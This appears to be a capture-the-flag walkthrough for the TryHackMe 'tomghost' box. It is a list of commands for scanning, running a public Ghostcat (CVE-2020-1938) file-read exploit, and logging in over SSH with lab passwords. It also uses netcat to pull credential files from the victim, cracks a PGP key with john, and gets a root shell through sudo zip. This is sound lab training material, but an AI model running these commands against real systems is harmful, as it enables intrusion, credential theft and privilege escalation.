tomghost

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/8080 - HTTP

Kali

gobuster dir -u http://$VICTIM:8080 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Initial Access

Victim

git clone https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat.git 
cd Hacking-Vulnerability-CVE-2020-1938-Ghostcat/
python2 CVE-2020-1938.py $VICTIM -p 8009 -f WEB-INF/web.xml

TCP/22 - SSH

Kali

ssh skyfuck@$VICTIM
Password: 8730281lkjlkjdqlksalks

Netcat

Kali(receiving)

nc -l -p 1234 > credential.pgp
nc -l -p 1234 > tryhackme.asc

Victim(sending)

nc -w 3 $KALI 1234 < credential.pgp
nc -w 3 $KALI 1234 < tryhackme.asc

Kali

/opt/john/gpg2john tryhackme.asc > pgp.hash
john pgp.hash --wordlist=/usr/share/wordlists/rockyou.txt

Kali

gpg --import tryhackme.asc 
Password: alexandru

Kali

gpg --decrypt credential.pgp 
Password: alexandru

Privilege Escalation

TCP/22 - SSH

Kali

ssh merlin@$VICTIM
Password: asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

Exploit: https://gtfobins.github.io/gtfobins/zip/

Victim

sudo -l

Victim

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF

PreviousLinux PrivEsc Arena NextThe Docker Rodeo

Last updated 7 months ago